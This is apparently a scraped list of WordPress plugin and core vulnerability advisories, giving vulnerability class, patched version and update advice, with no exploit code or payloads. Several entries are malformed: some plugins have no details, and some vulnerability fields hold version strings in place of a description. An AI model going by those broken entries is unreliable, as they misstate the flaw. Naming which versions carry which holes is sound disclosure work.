Plugin: Redirect By Cookie

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.07
Recommended Action: Update to version 1.07, or a newer patched version

Plugin: iFolders – Ultimate Folder Organizer for Media Library, Pages, Posts and Users

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.7.4
Recommended Action: Update to version 0.9.7.4, or a newer patched version

Plugin: EWWW Image Optimizer

Vulnerability: Unauthenticated Sensitive Information Exposure via Debug Log
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Missing Authorization to Settings Changes
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via platform
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Cross-Site Scripting
Patched Version: 4.2.12
Recommended Action: Update to version 4.2.12, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Arbitrary File Upload
Patched Version: 6.4.1
Recommended Action: Update to version 6.4.1, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 20230901
Recommended Action: Update to version 20230901, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: OS Command Injection
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 32.0.7
Recommended Action: Update to version 32.0.7, or a newer patched version

Plugin: WZone – Lite Version

Vulnerability: Lite <= 3.1
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jquery news ticker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: WP Travel – Ultimate Travel Booking System, Tour Management Engine

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: 7.8.1
Recommended Action: Update to version 7.8.1, or a newer patched version

Plugin: Announcement & Notification Banner – Bulletin

Vulnerability: Missing Authorization Checks
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated (Contributor+) Local File Inclusion via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hubbub Lite – Fast, Reliable Social Sharing Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.19.0
Recommended Action: Update to version 1.19.0, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘search_name’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Marketplace – Complete Shopping Cart / eCommerce Solution

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in savetranslationstay function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) PHAR Deserialization
Patched Version: 3.7.10
Recommended Action: Update to version 3.7.10, or a newer patched version

Plugin: Smart Flv

Plugin: Quick Event Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting in oEmbed
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Wallet for WooCommerce

Vulnerability: Cross-Site Request Forgery via admin_options
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Coming Soon & Maintenance Mode Page & Under Construction

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.58
Recommended Action: Update to version 1.58, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.23
Recommended Action: Update to version 3.4.23, or a newer patched version

Plugin: HappyFiles Pro

Vulnerability: Missing Authorization
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Tiny Carousel Horizontal Slider

Plugin: Multi-column Tag Map

Vulnerability: Cross-Site Request Forgery
Patched Version: 17.0.27
Recommended Action: Update to version 17.0.27, or a newer patched version

Plugin: TinyMCE Custom Styles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WPZOOM Shortcodes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Request a Quote

Vulnerability: CSV Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: Team Showcase

Vulnerability: Object Injection
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: WP Brutal AI

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Ultimate Instagram Feed – WordPress Plugin

Vulnerability: WordPress Plugin < 1.3.1
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.10.9
Recommended Action: Update to version 1.10.9, or a newer patched version

Plugin: Seraphinite Accelerator

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.20.32
Recommended Action: Update to version 2.20.32, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Firebase Server Key Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Football Live Scores

Plugin: Optinly – Exit Intent, Newsletter Popups, Gamification & Opt-in Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Klaviyo

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Comment Attachment

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Grid Plus – Unlimited grid layout

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Grid Layout Add/Update/Delete
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Path Traversal
Patched Version: 1.3.43
Recommended Action: Update to version 1.3.43, or a newer patched version

Plugin: WordPress Books Gallery

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Changes
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: B2BKing — Ultimate WooCommerce Wholesale and B2B Solution — Wholesale Order Form, Catalog Mode, Dynamic Pricing & More

Vulnerability: Missing Authorization to Authenticated(Subscriber+) Information Disclosure
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Reflected Cross-Site Scripting via cf-api
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Count per Day

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 4.6.9
Recommended Action: Update to version 4.6.9, or a newer patched version

Plugin: Print My Blog – Print, PDF, & eBook Converter WordPress Plugin

Vulnerability: Unprotected AJAX Actions
Patched Version: 3.15.9
Recommended Action: Update to version 3.15.9, or a newer patched version

Plugin: Dynamic Widgets

Vulnerability: Cross Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: JS Multi Hotel

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via Generator Tag
Patched Version: 3.7.26
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.26, 3.8.26, 3.9.24, 4.0.23, 4.1.23, 4.2.20, 4.3.16, 4.4.15, 4.5.14, 4.6.11, 4.7.10, 4.8.6, 4.9.5

Plugin: wp-ecommerce-cvs-importer

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Captcha Bypass
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Blocksy Companion

Vulnerability: Authenticated(Subscriber+) Sensitive Information Exposure via blocksy_posts shortcode
Patched Version: 1.8.82
Recommended Action: Update to version 1.8.82, or a newer patched version

Plugin: IMPress Listings

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Listing Fields
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Super Store Finder

Vulnerability: Unauthenticated Email Creation/Sending
Patched Version: 6.9.4
Recommended Action: Update to version 6.9.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Improper Access Control
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Mail Masta

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Fathom Analytics for WP

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: PHP Everywhere

Vulnerability: Remote Code Execution by Subscriber+ users via shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Import Spreadsheets from Microsoft Excel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 10.1.4
Recommended Action: Update to version 10.1.4, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: GF Windcave Free

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Duplication
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Automatic pages for Privacy Policy, Terms, About, Contact us

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.42
Recommended Action: Update to version 1.42, or a newer patched version

Plugin: Super Progressive Web Apps

Vulnerability: Missing Authorization
Patched Version: 2.2.22
Recommended Action: Update to version 2.2.22, or a newer patched version

Plugin: Testimonial

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Cross-Site Request Forgery via save
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: YUZO

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 5.12.94
Recommended Action: Update to version 5.12.94, or a newer patched version

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Remote Code Execution
Patched Version: 1.1.4.6
Recommended Action: Update to version 1.1.4.6, or a newer patched version

Plugin: Predictive Search

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Easy Testimonials

Plugin: Seo 301 Meta

Plugin: HD Quiz

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: Weather Effect – Christmas, Santa, Snow Falling, Snowflake Effect

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Login Block IPs

Plugin: Team Showcase

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery < 2.0.6
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Decon WP SMS

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: pTypeConverter

Plugin: easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: PixFields

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.7.1
Recommended Action: Update to version 0.7.1, or a newer patched version

Plugin: Soisy Pagamento Rateale

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 6.0.2
Recommended Action: Update to version 6.0.2, or a newer patched version

Plugin: OPcache Dashboard

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Uk Cookie

Plugin: Dewplayer

Plugin: PromoBar by BestWebSoft – Customizable Advertisement Banner for WordPress Website

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: S3 Video Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 0.98
Recommended Action: Update to version 0.98, or a newer patched version

Plugin: Responsive Zoom In/Out Slider WordPress Plugin

Plugin: SpiderVPlayer

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Quick Chat

Vulnerability: SQL Injection
Patched Version: 4.00
Recommended Action: Update to version 4.00, or a newer patched version

Plugin: Digirisk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.1.0.0
Recommended Action: Update to version 6.1.0.0, or a newer patched version

Plugin: DW Question & Answer

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.2.3
Recommended Action: Update to version 1.4.2.3, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Ajax Pagination (twitter Style)

Plugin: WP Dark Mode – WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing

Vulnerability: Authenticated (Subscriber+) Local File Inclusion via ‘style’
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: FoxyPress

Vulnerability: Open Redirect
Patched Version: 0.4.2.8
Recommended Action: Update to version 0.4.2.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘deleteRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 5.12.7
Recommended Action: Update to version 5.12.7, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: Image Optimizer, Resizer and CDN – Sirv

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: Responsive Lightbox2

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Booking Package

Vulnerability: Reflected Cross-Site Scripting via ‘mode’
Patched Version: 1.6.02
Recommended Action: Update to version 1.6.02, or a newer patched version

Plugin: Responsive Clients Logo Gallery Plugin for WordPress – Smart Logo Showcase Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via dn
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Scripting
Patched Version: 4.6.0.3
Recommended Action: Update to version 4.6.0.3, or a newer patched version

Plugin: Change WooCommerce Add To Cart Button Text

Vulnerability: Missing Authorization via rexvs_settings_submit
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Authentication Bypass
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: SureFeedback Client Site

Vulnerability: Missing Authorization via ph_child_ajax_notice_handler
Patched Version: 1.0.35
Recommended Action: Update to version 1.0.35, or a newer patched version

Plugin: Knews Multilingual Newsletters

Vulnerability: SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WP Ultimate Email Marketer

Plugin: Post Meta Data Manager

Vulnerability: Cross-Site Request Forgery to Post, Term, and User Meta Deletion
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: CP Image Store with Slideshow

Vulnerability: Arbitrary File Download
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Information Disclosure
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: WP Forum Server

Vulnerability: SQL Injection
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Contact Form to Any API

Vulnerability: Missing Authorization via delete_cf7_records()
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Mail Queue

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Unauthenticated SQL Injection via bwg_tag_id_bwg_thumbnails_0 Parameter
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Ebook Store

Vulnerability: Missing Authorization via ebook_store_export_orders
Patched Version: 5.78
Recommended Action: Update to version 5.78, or a newer patched version

Plugin: Auto Tag Creator

Vulnerability: Missing Authorization via tag_save_settings_callback
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Conferencing with Zoom

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.16
Recommended Action: Update to version 3.8.16, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Local File Inclusion
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: My Wish List

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: FLV Embed

Plugin: Soundy Background Music

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WPCS – WordPress Currency Switcher Professional

Vulnerability: Missing Authorization to Arbitrary Custom Drop-Down Currency Switcher Editing
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 21.8
Recommended Action: Update to version 21.8, or a newer patched version

Plugin: 3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.13.3
Recommended Action: Update to version 1.13.3, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘cronLogDeleteOption’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Steveas WP Live Chat Shoutbox

Plugin: ThinkTwit

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Booking Calendar | Appointment Booking | Bookit

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: uncode-core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.39
Recommended Action: Update to version 2.5.39, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Cross-Site Request Forgery via delete_item
Patched Version: 2.1.0.14
Recommended Action: Update to version 2.1.0.14, or a newer patched version

Plugin: Kish Guest Posting

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Product Filter For WooCommerce Product

Plugin: Codestyling Localization

Vulnerability: Reflected Cross Site Scripting
Patched Version: 1.99.20
Recommended Action: Update to version 1.99.20, or a newer patched version

Plugin: Blog-in-Blog

Vulnerability: Authenticated (Editor+) Local File Inclusion via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Publisher Media Kit

Vulnerability: Regular Expression Denial of Service
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Object Injection
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Easy Career Openings

Plugin: Media Library Categories

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Bulk Order Form for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Missing Authorization via get_history
Patched Version: 1.14.14
Recommended Action: Update to version 1.14.14, or a newer patched version

Plugin: Limb Gallery | Create Beautiful Image & Video Galleries

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Testimonial Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Espresso – Event Registration & Ticketing Sales

Vulnerability: Feature Bypass
Patched Version: 4.10.45.decaf
Recommended Action: Update to version 4.10.45.decaf, or a newer patched version

Plugin: Order Your Posts Manually

Vulnerability: Reflected Cross-Site Scripting via ‘cat_id’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kebo Twitter Feed

Vulnerability: Cross-Site Request Forgery via kebo_twitter_menu_render
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Kinds

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1.1
Recommended Action: Update to version 1.3.1.1, or a newer patched version

Plugin: Flex Local Fonts

Plugin: AN_GradeBook

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Nofollow

Plugin: Shiny Buttons – CSS3 Button Generator for WordPress

Plugin: Ultimate Maps by Supsystic

Vulnerability: Reflected Cross-Site scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: post highlights

Vulnerability: 2.6
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: MainWP Article Uploader Extension

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Stream

Vulnerability: Missing Authorization via load_alerts_settings
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 2.35
Recommended Action: Update to version 2.35, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: WP-OliveCart

Plugin: FileBird – WordPress Media Library Folders & File Manager

Vulnerability: Missing Authorization via resAdminPermissionsCheck
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: AllWebMenus WordPress Menu Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: WCP OpenWeather

Plugin: Rating by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

